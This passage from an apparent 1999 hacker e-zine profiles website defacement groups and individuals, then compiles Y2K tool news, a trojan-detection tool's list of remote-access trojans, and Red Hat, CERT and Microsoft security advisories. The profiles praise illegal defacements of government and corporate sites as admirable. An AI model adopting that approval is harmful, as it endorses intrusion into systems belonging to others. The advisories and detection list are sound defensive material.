  8935.       remembers the goat team, it consisted of members of gH, HcV and I think even a few
  8936.       from LoU. They defaced a good amount of websites and made a widely known name
  8937.       for themselves. They definitely knew what they were doing, not like all of the CF(cold
  8938.       fusion) kiddies you see around these days.
  8939.      
  8940.       Mirrors of their Website Defacements
  8941.       http://www.attrition.org/mirror/attrition/goat.html
  8942.        
  8943.      
  8944.       gH (global Hell) - Possibly the most world wide known hacker group and most
  8945.       media exposed, gH defaced allot of high profile websites such as Macweek,
  8946.       Peoples Court, The Main Army Page and the Whitehouse. Many members
  8947.       were later raided by FBI agents due to the defacing of the Whitehouse
  8948.       website. They have skill and as far I saw it a very good team of people. This
  8949.       group will always be remembered.
  8950.      
  8951.       Mirrors of their Website Defacements
  8952.       http://www.attrition.org/mirror/attrition/gh.html
  8953.        
  8954.      
  8955.       Level Seven - This crew was responsible for numerous defacements, it is rumored
  8956.       also and stated on some of their defacements that members of this group were a part
  8957.       of gH (global Hell) and got raided. This group was another group that hacked for a
  8958.       decent reason. Mentionable mostly because of their tie-ins with gH. None the less
  8959.       they are a good group.
  8960.      
  8961.       Mirrors of their Website Defacements
  8962.       http://www.attrition.org/mirror/attrition/l7.html
  8963.        
  8964.      
  8965.       Stonehenge Crew - Not very much to say about this group other than they have a
  8966.       purpose for what they do. They always have a reason for defacing a website they hit.
  8967.       They have done around 14 webpage defacements. It is rumored they are also 'tight'
  8968.       with the known group gH. This is another good group.
  8969.      
  8970.       Mirrors of their Website Defacements
  8971.       http://www.attrition.org/mirror/attrition/henge.html
  8972.      
  8973.        
  8974.      
  8975.       Keebler Elves - Well, this group is probably the most skilled up to now in 1999.
  8976.       Many skilled individuals, coders and hacker alike in it, from what is said at least.
  8977.       They are best known for their hacks of the Department of Education, Virgin
  8978.       Records and the Monmouth Army Base. Probably has done the most
  8979.       recognized sites in 1999. And I wouldn't be surprised if they continue to hack
  8980.       big time names. This group deserves allot of respect. Why? Because they
  8981.       aren't like the rest.
  8982.      
  8983.       Mirrors of their Website Defacements
  8984.       http://www.attrition.org/mirror/attrition/keebler.html
  8985.        
  8986.      
  8987.       HFD (Hacking for Drunks) - This is another group well known for it's choice of sites
  8988.       to deface. Probably most well recognized for their 20th Century Fox International,
  8989.       Gibson and Blair Witch website hacks. They seem to have a good sense of
  8990.       humor and have done some entertaining defacements. Very good group. But
  8991.       name/logo kind of ripped from HFG(Hacking For Girls).
  8992.      
  8993.       Mirrors of their Website Defacements
  8994.       http://www.attrition.org/mirror/attrition/hfd.html
  8995.        
  8996.      
  8997.       bl0w team - A good Brazilian hackers group, consisting of 5 individuals, best noted
  8998.       for their 2600.co.uk and Telemar hacks. They do it all for an adequate reason
  8999.       and do not give up. I think there patriotism is admirable. They also seem to
  9000.       have a good amount of skill dealing with Solaris/NT systems.
  9001.      
  9002.       Mirrors of their Website Defacements
  9003.       http://www.attrition.org/mirror/attrition/bl0w.html
  9004.        
  9005.      
  9006.       INDIANHackers/EHA/Ant1 S3cur1ty Tskf0rc3/MST(Moscow Security Team)
  9007.      
  9008.       Nothing special, not really even worth the time, they did a 'few' sites and were never
  9009.       heard from again. None of them had really any reason for defacing websites other
  9010.       than to make themselves look big. Ant1 S3cur1ty Taskf0rc3 did a few with reason,
  9011.       but it was rare with these 4 groups.
  9012.      
  9013.       Mirrors of all the groups defacements :
  9014.      
  9015.       [INDIANHackers] 
  9016.       http://www.attrition.org/mirror/attrition/ndian.html
  9017.       
  9018.       [EHA] 
  9019.       http://www.attrition.org/mirror/attrition/eha.html
  9020.       
  9021.       [Ant1 s3cur1ty taskf0rce]
  9022.       http://www.attrition.org/mirror/attrition/asc.html
  9023.       
  9024.       [MST] 
  9025.       http://www.attrition.org/mirror/attrition/mst.html
  9026.        
  9027.      
  9028.       -end-
  9029.      
  9030.        
  9031.      
  9032.       Individuals
  9033.      
  9034.       zo0mer - Hit allot of government/military systems and banks. But it appears he
  9035.       removes data from the boxes after he is done. What would be labeled a malacious
  9036.       script kiddie cracker.
  9037.      
  9038.       Mirror of all his/her hacks
  9039.       http://www.attrition.org/mirror/attrition/zoom.html
  9040.        
  9041.      
  9042.       p0gO - Probably best known for his defacing of Time Warner San Diego. Not to
  9043.       mention his mass hack, he appears to have good skills, also is recognized
  9044.       for his association with irc.psychic.com.
  9045.      
  9046.       Mirror of all his/her hacks
  9047.       http://www.attrition.org/mirror/attrition/pogo.html
  9048.        
  9049.      
  9050.       Xoloth1 - Well known hacker from the Netherlands. Hit some well known porn sites
  9051.       and what would appear to be his spotlight defacement Pentagon.co.yu. Xoloth
  9052.       hacks for all the rite reasons.
  9053.      
  9054.       Mirror of all his/her hacks
  9055.       http://www.attrition.org/mirror/attrition/xoloth.html
  9056.        
  9057.      
  9058.       v00d00 - First showed up on the scene doing a hack for Psychic, shortly after
  9059.       doing defacements when he was part of the group Defiance it appears. He
  9060.       appears to hack for the freedom of Kevin Mitnick AKA Condor and against
  9061.       war, racism and allot of problems that happen in the world these days. He
  9062.       does it for a good cause. That is all there is to say.
  9063.      
  9064.       Mirror of all his/her hacks
  9065.       http://www.attrition.org/mirror/attrition/v00.html
  9066.        
  9067.      
  9068.       Mozy - Started hacking for irc.psychic.com, later went individual, noted to be good
  9069.       friends with several known hackers. His defacements are quite humorous if you ask
  9070.       me. Keep it up.
  9071.      
  9072.       Mirror of all his/her hacks
  9073.       http://www.attrition.org/mirror/attrition/mozy.html
  9074.        
  9075.      
  9076.       dr_fdisk^ - Extremely well known Spanish hacker and for being in the group Raza
  9077.       Mexicana. Most well known for compromising such sites as Nic.bo and
  9078.       HBO, Latin America. Another hacker that does it for the freedom of Kevin
  9079.       Mitnick and many other reasons.
  9080.      
  9081.       Mirror of all his/her hacks
  9082.       http://www.attrition.org/mirror/attrition/fdisk.html
  9083.        
  9084.      
  9085.       There are other individuals I missed and they all deserve respect and to be noticed, I
  9086.       didn't for get them because I dislike them, just because this part of the article has
  9087.       gone far enough.
  9088.      
  9089.        
  9090.      
  9091.       What was hit?
  9092.      
  9093.       Aside from all the no-name sites that were hacked. In 1999 there has been several
  9094.       HIGH PROFILE web defacements. Below is a list with a link to the defaced site,
  9095.       provided by Attrition.
  9096.      
  9097.          - Klu Klux Klan 
  9098.          - LOD Communication 
  9099.          - 200cigarettes Movie 
  9100.          - Whitepride 
  9101.          - No Limit Records 
  9102.          - Hotbot Search Engine 
  9103.          - Summercon 
  9104.          - eBay 
  9105.          - Coca Cola (BE) 
  9106.          - US Senate 
  9107.          - HBO, Latin America 
  9108.          - The White House 
  9109.          - Army Main Site 
  9110.          - and so many more.... 
  9111.      
  9112.        
  9113.      
  9114.       Why do they do it?
  9115.      
  9116.       MOST of the time it is to make a name and become known/noticed, but on some
  9117.       occasions people do it for a reason, to prove faulty security, to protest against a
  9118.       certain problem in the world or a personal dispute. 
  9119.      
  9120.       Well that pretty much covers 1999. Most of the remembered parts up to now
  9121.       anyways.
  9122.      
  9123.       Thanks allot,
  9124.      
  9125.       I prefer to remain anonymous.
  9126.      
  9127.       Sites to check out : 
  9128.       
  9129.       Rootshell,      
  9130.       http://www.rootshell.org   
  9131.       
  9132.       Attrition,      
  9133.       http://www.attrition.org   
  9134.       
  9135.       HNN
  9136.       http://www.hackernews.com
  9137.       
  9138.       OSAll
  9139.       http://www.aviary-mag.com
  9140.       
  9141.        
  9142.      
  9143.                   Written by anonymous for HNS (www.net-security.org) 
  9144.      @HWA
  9145.     
  9146.                   
  9147.  
  9148. 68.0 Y2K crash test
  9149.      ~~~~~~~~~~~~~~
  9150.      
  9151.      From http://www.net-security.org/
  9152.      
  9153.      
  9154.      by BHZ, Sunday 25th July 1999 on 2:21 pm CET
  9155.      Y2K Crash Test (Windows 95/98 version) collects information about your hardware,
  9156.      programs, Windows settings, and data files, tests their functionality during various
  9157.      dates known to cause problems with non-Y2K compliant files, displays
  9158.      comprehensive results, and allows you to print them. 
  9159.      
  9160.      Download the program here (1.07Mb): http://www.net-security.org/dload/y2k/nocrash3.exe 
  9161.      Screenshot: http://www.net-security.org/dload/y2k/nocrash.jpg      
  9162.  
  9163.  
  9164.      Y2K TEST FOR DOS
  9165.      
  9166.      by BHZ, Sunday 25th July 1999 on 2:14 pm CET
  9167.      Y2K TEST for DOS is a millennium bug diagnostic and repair utility used to test how
  9168.      a PC will handle year 2000 dates and beyond. The included fix restores year 2000
  9169.      compliance by installing a device driver that compensates for non-compliant real-time
  9170.      clocks, thereby fixing BIOS bugs including the Award 4.50G BIOS problem. Just to
  9171.      note it is updated version of the program we wrote about earlier. 
  9172.      
  9173.      Download the program here (560kb). http://www.net-security.org/dload/y2k/y2kdos.zip
  9174.      Screenshot. http://www.net-security.org/dload/y2k/y2kdostest.gif
  9175.      
  9176. 69.0 CASSANDRA GOLD
  9177.      ~~~~~~~~~~~~~~
  9178.      
  9179.      From http://www.net-security.org/ 
  9180.      
  9181.      by BHZ, Sunday 25th July 1999 on 3:11 am CET
  9182.      Cassandra GOLD is new trojan detection and removal program that could be run on
  9183.      windows 95 and windows 98 operating systems. It currently can find 25 trojans 
  9184.      
  9185.      NetBus 2.0
  9186.      NetBus 1.7
  9187.      NetBus 1.6
  9188.      BackOrifice 1.20
  9189.      Masters Paradise 9.7
  9190.      Deep Throat 1.0
  9191.      Deep Throat 2.0
  9192.      Deep Throat 3.0
  9193.      GirlFriend 1.35 (Old)
  9194.      GirlFriend 1.35 (New)
  9195.      WinCrash 1.03
  9196.      WEB EX 1.2
  9197.      Telecommando
  9198.      NetBus 2.01
  9199.      SubSeven 1.5
  9200.      GateCrasher 1.2
  9201.      COMA
  9202.      HACK99
  9203.      Hack-a-Tack
  9204.      Millenium
  9205.      NetSpy 2.0
  9206.      OpC BO v2.0
  9207.      Spying King
  9208.      BladeRunner
  9209.      NetSphere
  9210.  
  9211.      
  9212.      
  9213.      Download Cassandra GOLD US edition or http://www.net-security.org/dload/Cassandra-US.zip
  9214.      Cassandra GOLD Swedish edition. http://www.net-security.org/dload/Cassandra-SE.zip
  9215.      
  9216.      Homepage - http://www.win32software.com. 
  9217.      
  9218.      @HWA
  9219.      
  9220. 70.0 BELL CANADA Y2K TEST
  9221.      ~~~~~~~~~~~~~~~~~~~~
  9222.      
  9223.      From http://www.net-security.org/
  9224.      
  9225.      by BHZ, Saturday 24th July 1999 on 11:05 pm CET
  9226.      Bell Canada (www.bell.ca), telephone operator in Canada was working hard on
  9227.      preparing new Y2K-ready system, and yesterday they transferred 7500 customer to
  9228.      the new system. It all worked good for 3 hours, but then the system crashed. So
  9229.      those "lucky ones" couldn't use their phone services for couple of hours, until it was
  9230.      all fixed.      
  9231.      
  9232.      @HWA
  9233.      
  9234. 71.0 [RHSA-1999:025-01] Potential misuse of squid cachemgr.cgi 
  9235.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9236.  
  9237.      Date: Fri, 30 Jul 1999 11:08:07 -0400 
  9238.      From: Bill Nottingham <notting@redhat.com> 
  9239.      To: redhat-watch-list@redhat.com 
  9240.      Cc: linux-security@redhat.com 
  9241.      Subject: [linux-security] [RHSA-1999:025-01] Potential misuse of squid cachemgr.cgi 
  9242.      
  9243.      
  9244.      ---------------------------------------------------------------------
  9245.                Red Hat, Inc. Security Advisory
  9246.      
  9247.      
  9248.      Synopsis:     Potential misuse of squid cachemgr.cgi
  9249.      Advisory ID:       RHSA-1999:025-01
  9250.      Issue date:     1999-07-29
  9251.      Updated on:     
  9252.      Keywords:     squid cachemgr.cgi connect
  9253.      Cross references:   
  9254.      ---------------------------------------------------------------------
  9255.      
  9256.      
  9257.      1. Topic:
  9258.      
  9259.      
  9260.      cachemgr.cgi, the manager interface to Squid, is installed by
  9261.      default in /home/httpd/cgi-bin. If a web server (such as apache)
  9262.      is running, this can allow remote users to sent connect() requests
  9263.      from the local machine to arbitrary hosts and ports.
  9264.      
  9265.      
  9266.      2. Bug IDs fixed:
  9267.      
  9268.      
  9269.      3. Relevant releases/architectures:
  9270.      
  9271.      
  9272.      Red Hat Linux 6.0, all architectures
  9273.      Red Hat Linux 5.2, all architectures
  9274.      
  9275.      
  9276.      4. Obsoleted by:
  9277.      
  9278.      
  9279.      5. Conflicts with:
  9280.      
  9281.      
  9282.      6. RPMs required:
  9283.      
  9284.      
  9285.      Red Hat Linux 6.0:
  9286.      
  9287.      
  9288.      Intel:
  9289.        ftp://updates.redhat.com/6.0/i386/squid-2.2.STABLE4-5.i386.rpm
  9290.      
  9291.      
  9292.      Alpha:
  9293.        ftp://updates.redhat.com/6.0/alpha/squid-2.2.STABLE4-5.alpha.rpm
  9294.      
  9295.      
  9296.      Sparc:
  9297.        ftp://updates.redhat.com/6.0/sparc/squid-2.2.STABLE4-5.sparc.rpm
  9298.      
  9299.      
  9300.      Source packages:
  9301.        ftp://updates.redhat.com/6.0/SRPMS/squid-2.2.STABLE4-5.src.rpm
  9302.      
  9303.      
  9304.      Red Hat Linux 5.2:
  9305.      
  9306.      
  9307.      Intel:
  9308.        ftp://updates.redhat.com/5.2/i386/squid-2.2.STABLE4-0.5.2.i386.rpm
  9309.      
  9310.      
  9311.      Alpha:
  9312.        ftp://updates.redhat.com/5.2/alpha/squid-2.2.STABLE4-0.5.2.alpha.rpm
  9313.      
  9314.      
  9315.      Sparc:
  9316.        ftp://updates.redhat.com/5.2/sparc/squid-2.2.STABLE4-0.5.2.sparc.rpm
  9317.      
  9318.      
  9319.      Source packages:
  9320.        ftp://updates.redhat.com/5.2/SRPMS/squid-2.2.STABLE4-0.5.2.src.rpm
  9321.      
  9322.      
  9323.      7. Problem description:
  9324.      
  9325.      
  9326.      A remote user could enter a hostname/IP address and port
  9327.      number, and the cachemgr CGI would attempt to connect to that
  9328.      host and port, printing the error if it fails.
  9329.      
  9330.      
  9331.      8. Solution:
  9332.      
  9333.      
  9334.      For each RPM for your particular architecture, run:
  9335.      rpm -Uvh <filename>
  9336.      where filename is the name of the RPM.
  9337.      
  9338.      
  9339.      Alternatively, you can simply disable the cachemgr.cgi,
  9340.      by editing your http daemons access control files or
  9341.      deleting/moving the cachemgr.cgi binary.
  9342.      
  9343.      
  9344.      9. Verification:
  9345.      
  9346.      
  9347.      MD5 sum                           Package Name
  9348.      --------------------------------------------------------------------------
  9349.      80d527634fc8d8d2029532a628b3d924  squid-2.2.STABLE4-5.i386.rpm
  9350.      65d18747148d7e3dae4249fe65c18c6b  squid-2.2.STABLE4-5.alpha.rpm
  9351.      734f84b949752fe39b5e58555210ff51  squid-2.2.STABLE4-5.sparc.rpm
  9352.      02a93b0b1985f8d5c77eb8f3e8981eeb  squid-2.2.STABLE4-5.src.rpm
  9353.      
  9354.      
  9355.      175b42cc4b603242fbb95e345c14963c  squid-2.2.STABLE4-0.5.2.i386.rpm
  9356.      f8dfc1198e32c645ed57769a44f3aa6d  squid-2.2.STABLE4-0.5.2.alpha.rpm
  9357.      2e11f629d2f15af8442d6b724ea4d020  squid-2.2.STABLE4-0.5.2.sparc.rpm
  9358.      0ea1522539d2aebf298881571253e13d  squid-2.2.STABLE4-0.5.2.src.rpm
  9359.      
  9360.      
  9361.      These packages are PGP signed by Red Hat Inc. for security.  Our key
  9362.      is available at:
  9363.      http://www.redhat.com/corp/contact.html
  9364.      You can verify each package with the following command:
  9365.      rpm --checksig  <filename>
  9366.      If you only wish to verify that each package has not been corrupted or
  9367.      tampered with, examine only the md5sum with the following command:
  9368.      rpm --checksig --nopgp <filename>
  9369.      
  9370.      
  9371.      10. References:
  9372.      
  9373.      
  9374.      -- 
  9375.      ----------------------------------------------------------------------
  9376.      Please refer to the information about this list as well as general
  9377.      information about Linux security at http://www.aoy.com/Linux/Security.
  9378.      ----------------------------------------------------------------------
  9379.      
  9380.      
  9381.      To unsubscribe:
  9382.        mail -s unsubscribe linux-security-request@redhat.com < /dev/null     
  9383.      
  9384.      @HWA     
  9385.      
  9386.      
  9387. 72.0 [RHSA-1999:022-03] New Samba pacakges available (updated)      
  9388.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9389.     
  9390.      Date: Thu, 29 Jul 1999 14:26:26 -0400 
  9391.      From: Bill Nottingham <notting@redhat.com> 
  9392.      To: redhat-watch-list@redhat.com 
  9393.      Cc: linux-security@redhat.com 
  9394.      Subject: [linux-security] [RHSA-1999:022-03] New Samba pacakges available (updated) 
  9395.      
  9396.      
  9397.      ---------------------------------------------------------------------
  9398.                Red Hat, Inc. Security Advisory
  9399.      
  9400.      
  9401.      Synopsis:           New samba packages for Red Hat Linux 4.2, 5.2, 6.0
  9402.      Advisory ID:       RHSA-1999:022-02
  9403.      Issue date:     1999-07-22
  9404.      Updated on:     1999-07-29
  9405.      Keywords:     samba smbd nmbd security
  9406.      Cross references:   
  9407.      ---------------------------------------------------------------------
  9408.      
  9409.      
  9410.      Revision History:
  9411.      1999-07-23: Fix 'Conflicts with' section about smbmount with 2.0/2.2
  9412.                   kernels.
  9413.      1999-07-29: Add note about %postun of Red Hat Linux 6.0 samba release.
  9414.      
  9415.      
  9416.      1. Topic:
  9417.      
  9418.      
  9419.      Samba 2.0.5a has been released. Among the fixes in this release
  9420.      are several security issues present in previous Samba releases.
  9421.      
  9422.      
  9423.      2. Bug IDs fixed:
  9424.      
  9425.      
  9426.      1321 2557 2625 2779 2923 2982 3715
  9427.      
  9428.      
  9429.      3. Relevant releases/architectures:
  9430.      
  9431.      
  9432.      Red Hat Linux 6.0, all architectures
  9433.      
  9434.      
  9435.      Red Hat Linux 5.2, all architectures
  9436.      
  9437.      
  9438.      Red Hat Linux 4.2, all architectures
  9439.      
  9440.      
  9441.      4. Obsoleted by:
  9442.      
  9443.      
  9444.      5. Conflicts with:
  9445.      
  9446.      
  9447.      The smbmount code shipped with Samba 2.0 is only compatible
  9448.      with the Linux 2.2 kernel, so it has not been built for
  9449.      the Red Hat Linux 4.2 and 5.2 releases. If smbmount
  9450.      support for the 2.2 kernel is needed under Red Hat Linux
  9451.      4.2 or 5.2, the source RPM can be rebuilt with the following
  9452.      command line (RPM version 3.0 is required):
  9453.      
  9454.      
  9455.      rpm --define "KERN22 yes" --rebuild samba-2.0.5a-<release>.src.rpm
  9456.      
  9457.      
  9458.      
  9459.      The samba package shipped with Red Hat Linux 6.0 (samba-2.0.3-8)
  9460.      has an erroneous post-uninstall script. If this package is upgraded
  9461.      to the errata release, it could cause  /var/log/samba and
  9462.      /var/lock/samba to be missing. It is recommended that users
  9463.      of samba under Red Hat Linux 6.0 uninstall the previous release
  9464.      using 'rpm -e samba' before installing the errata release.
  9465.      
  9466.      
  9467.      6. RPMs required:
  9468.      
  9469.      
  9470.      Red Hat Linux 6.0:
  9471.      
  9472.      
  9473.      Intel: ftp://updates.redhat.com/6.0/i386/
  9474.          samba-2.0.5a-1.i386.rpm
  9475.          samba-client-2.0.5a-1.i386.rpm
  9476.      
  9477.      
  9478.      Alpha: ftp://updates.redhat.com/6.0/alpha/
  9479.          samba-2.0.5a-1.alpha.rpm
  9480.          samba-client-2.0.5a-1.alpha.rpm
  9481.      
  9482.      
  9483.      Sparc: ftp://updates.redhat.com/6.0/sparc/
  9484.          samba-2.0.5a-1.sparc.rpm
  9485.          samba-client-2.0.5a-1.sparc.rpm
  9486.      
  9487.      
  9488.      Source: ftp://updates.redhat.com/6.0/
  9489.          samba-2.0.5a-1.src.rpm
  9490.      
  9491.      
  9492.      Red Hat Linux 5.2:
  9493.      
  9494.      
  9495.      Intel: ftp://updates.redhat.com/5.2/i386/
  9496.          samba-2.0.5a-0.5.2.i386.rpm
  9497.          samba-client-2.0.5a-0.5.2.i386.rpm
  9498.      
  9499.      
  9500.      Alpha: ftp://updates.redhat.com/5.2/alpha/
  9501.          samba-2.0.5a-0.5.2.alpha.rpm
  9502.          samba-client-2.0.5a-0.5.2.alpha.rpm
  9503.      
  9504.      
  9505.      Sparc: ftp://updates.redhat.com/5.2/sparc/
  9506.          samba-2.0.5a-0.5.2.sparc.rpm
  9507.          samba-client-2.0.5a-0.5.2.sparc.rpm
  9508.      
  9509.      
  9510.      Source: ftp://updates.redhat.com/5.2/
  9511.          samba-2.0.5a-0.5.2.src.rpm
  9512.      
  9513.      
  9514.      Red Hat Linux 4.2:
  9515.      
  9516.      
  9517.      Intel: ftp://updates.redhat.com/4.2/i386/
  9518.          samba-2.0.5a-0.4.2.i386.rpm
  9519.          samba-client-2.0.5a-0.4.2.i386.rpm
  9520.      
  9521.      
  9522.      Alpha: ftp://updates.redhat.com/4.2/alpha/
  9523.          samba-2.0.5a-0.4.2.alpha.rpm
  9524.          samba-client-2.0.5a-0.4.2.alpha.rpm
  9525.      
  9526.      
  9527.      Sparc: ftp://updates.redhat.com/4.2/sparc/
  9528.          samba-2.0.5a-0.4.2.sparc.rpm
  9529.          samba-client-2.0.5a-0.4.2.sparc.rpm
  9530.      
  9531.      
  9532.      Source: ftp://updates.redhat.com/4.2/
  9533.          samba-2.0.5a-0.4.2.src.rpm
  9534.      
  9535.      
  9536.      7. Problem description:
  9537.      
  9538.      
  9539.      Several security issues were present in earlier samba releases.
  9540.      - a denial-of-service attack could be performed against nmbd.
  9541.      - a buffer overflow was present in the message service in smbd
  9542.        (not enabled by default under Red Hat Linux)
  9543.      - a race condition was present in smbmnt that could cause problems
  9544.        if installed setuid root (it is not installed setuid root by
  9545.        default under Red Hat Linux 6.0, and is not present under Red
  9546.        Hat Linux 4.2 or 5.2)
  9547.      
  9548.      
  9549.      Thanks go to Olaf Kirch (okir@caldera.de) for discovering the
  9550.      security holes, as well as the Samba team.
  9551.      
  9552.      
  9553.      8. Solution:
  9554.      
  9555.      
  9556.      Install the updated RPMs, and restart the affected services by
  9557.      running:
  9558.      
  9559.      
  9560.      /etc/rc.d/init.d/smb restart
  9561.      
  9562.      
  9563.      For each RPM for your particular architecture, run:
  9564.      rpm -Uvh <filename>
  9565.      where filename is the name of the RPM.
  9566.      
  9567.      
  9568.      9. Verification:
  9569.      
  9570.      
  9571.      MD5 sum                           Package Name
  9572.      --------------------------------------------------------------------------
  9573.      5167d97fb2f0949991555a3b8e86d509  samba-2.0.5a-1.i386.rpm
  9574.      969d609925bc09f9c113907124828dc6  samba-client-2.0.5a-1.i386.rpm
  9575.      d8091f3fa0aeda8febf3553d5b92f53f  samba-2.0.5a-1.alpha.rpm
  9576.      99f334ef87347877d1b79d4801044547  samba-client-2.0.5a-1.alpha.rpm
  9577.      58b1afe4c81028435e6cad1325d4bbee  samba-2.0.5a-1.sparc.rpm
  9578.      6e3939fcebba7ace639b766b1cf36cab  samba-client-2.0.5a-1.sparc.rpm
  9579.      5c87d78148a8a224e5f89e5dce9af1ae  samba-2.0.5a-1.src.rpm
  9580.      
  9581.      
  9582.      6ce227464edc1e79cf4433ede6d18c05  samba-2.0.5a-0.5.2.i386.rpm
  9583.      0f8d4c9606af2fd809c55a6dd3f9beae  samba-client-2.0.5a-0.5.2.i386.rpm
  9584.      cb51e889747ed1786996323863f64868  samba-2.0.5a-0.5.2.alpha.rpm
  9585.      f82cfb4807fa9399005a03d6dd65dca5  samba-client-2.0.5a-0.5.2.alpha.rpm
  9586.      d56551d53be6928556bb58517f265e9f  samba-2.0.5a-0.5.2.sparc.rpm
  9587.      371f7de9553d9c86c4b62d2a92c84bf0  samba-client-2.0.5a-0.5.2.sparc.rpm
  9588.      e411e3c19d19ab89d35e834c7d379589  samba-2.0.5a-0.5.2.src.rpm
  9589.      
  9590.      
  9591.      c5d267fc6b47a84f0571f0ce1a7a15aa  samba-2.0.5a-0.4.2.i386.rpm
  9592.      3d07e39245cdc5d8aa0ba8d50e6178f1  samba-client-2.0.5a-0.4.2.i386.rpm
  9593.      f3db3e6f607afbd861610570154fd19d  samba-2.0.5a-0.4.2.alpha.rpm
  9594.      7972cf576734d1b006258a8ca02c80ff  samba-client-2.0.5a-0.4.2.alpha.rpm
  9595.      c44a4c13f171f31686d91da3b8370311  samba-2.0.5a-0.4.2.sparc.rpm
  9596.      a6c235a206349e347dfe35ac0064d901  samba-client-2.0.5a-0.4.2.sparc.rpm
  9597.      0c326cb2a2b0964026d286fb5f6b8079  samba-2.0.5a-0.4.2.src.rpm
  9598.      
  9599.      
  9600.      These packages are PGP signed by Red Hat Inc. for security.  Our key
  9601.      is available at:
  9602.      http://www.redhat.com/corp/contact.html
  9603.      You can verify each package with the following command:
  9604.      rpm --checksig  <filename>
  9605.      If you only wish to verify that each package has not been corrupted or
  9606.      tampered with, examine only the md5sum with the following command:
  9607.      rpm --checksig --nopgp <filename>
  9608.      
  9609.      
  9610.      10. References:
  9611.          <19990721023513Z12865037-4222+1570@samba.anu.edu.au>
  9612.      
  9613.      
  9614.      -- 
  9615.      ----------------------------------------------------------------------
  9616.      Please refer to the information about this list as well as general
  9617.      information about Linux security at http://www.aoy.com/Linux/Security.
  9618.      ----------------------------------------------------------------------
  9619.      
  9620.      
  9621.      To unsubscribe:
  9622.        mail -s unsubscribe linux-security-request@redhat.com < /dev/null
  9623.        
  9624.      @HWA         
  9625.      
  9626. 73.0 CERT« Advisory CA-99-10 Insecure Default Configuration on RaQ2 Servers
  9627.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  9628.  
  9629.                     CERT« Advisory CA-99-10 Insecure Default Configuration on RaQ2 Servers
  9630.  
  9631.                     Originally released: July 30, 1999
  9632.                     Source: CERT/CC
  9633.                     See also: Cobalt Networks Security Announcement 
  9634.  
  9635.                     Systems Affected
  9636.  
  9637.                          Cobalt Networks RaQ2 single rack unit Internet servers 
  9638.  
  9639.        I. Description
  9640.  
  9641.        A vulnerability has been discovered in the default configuration of Cobalt Networks RaQ2 servers that allows remote users to install arbitrary software packages to
  9642.        the system. RaQ2 servers are configured with an administrative webserver to process remote requests to manage the unit. Systems installed with the default
  9643.        configuration have insufficient access control mechanisms to prevent remote users from adding arbitrary software packages to the system using this webserver. 
  9644.  
  9645.        A document published by Cobalt Networks describes the vulnerability and solutions in more detail: 
  9646.  
  9647.             http://www.cobaltnet.com/support/security/index.html 
  9648.  
  9649.        II. Impact
  9650.  
  9651.        Any remote user who can establish a connection to an administrative port on a vulnerable RaQ2 server can install arbitrary software packages on the server. This
  9652.        access can then be used to gain root privileges on the system. 
  9653.  
  9654.        III. Solution
  9655.  
  9656.        Configure your Systems to Guard Against this Vulnerability 
  9657.  
  9658.        Install the patches provided by Cobalt Networks: 
  9659.  
  9660.             http://www.cobaltnet.com/patches/RaQ2-Security-1.0.pkg (For RaQ2 servers) 
  9661.  
  9662.             http://www.cobaltnet.com/patches/RaQ2J-Security-1.0.pkg (For Japanese versions of the RaQ2 system) 
  9663.  
  9664.  
  9665.        The CERT/CC wishes to thank Cobalt Networks for their assistance in developing this advisory. 
  9666.  
  9667.        This document is available from: http://www.cert.org/advisories/CA-99-10-cobalt-raq2.html. 
  9668.  
  9669.  
  9670.        CERT/CC Contact Information
  9671.  
  9672.        Email: cert@cert.org
  9673.        Phone: +1 412-268-7090 (24-hour hotline)
  9674.        Fax: +1 412-268-6989
  9675.        Postal address:
  9676.             CERT Coordination Center
  9677.             Software Engineering Institute
  9678.             Carnegie Mellon University
  9679.             Pittsburgh PA 15213-3890
  9680.             U.S.A.
  9681.  
  9682.        CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S.
  9683.        holidays, and on weekends. 
  9684.  
  9685.        Using encryption
  9686.  
  9687.        We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to
  9688.        use DES, please call the CERT hotline for more information. 
  9689.  
  9690.        Getting security information
  9691.  
  9692.        CERT publications and other security information are available from our web site http://www.cert.org/. 
  9693.  
  9694.        To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of
  9695.        your message. 
  9696.  
  9697.        Copyright 1999 Carnegie Mellon University.
  9698.        Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html. 
  9699.  
  9700.        * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office 
  9701.  
  9702.        NO WARRANTY
  9703.        Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon
  9704.        University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a
  9705.        particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any
  9706.        warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. 
  9707.  
  9708.  
  9709.        Revision History
  9710.  
  9711.        July 30, 1999:  Initial release
  9712.        
  9713.        @HWA     
  9714.        
  9715. 74.0 MS Security Bulletin: Patch Available for "Malformed Dialer Entry" Vulnerability
  9716.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9717.      
  9718.      Microsoft Security Bulletin (MS99-026)
  9719.      
  9720.      --------------------------------------
  9721.      
  9722.       
  9723.      
  9724.      Patch Available for "Malformed Dialer Entry" Vulnerability
  9725.      
  9726.      Originally Posted: July 29, 1999
  9727.      
  9728.      Summary
  9729.      
  9730.      ======
  9731.      
  9732.      Microsoft has released a patch that eliminates a security vulnerability in the Phone Dialer accessory in Microsoft« Windows NT«. The
  9733.      vulnerability could be used to run arbitrary code in a userÆs security context on Windows NT systems.
  9734.      
  9735.      Frequently asked questions regarding this vulnerability can be found
  9736.      
  9737.      at http://www.microsoft.com/security/bulletins/MS99-026faq.asp
  9738.      
  9739.      Issue
  9740.      
  9741.      ====
  9742.      
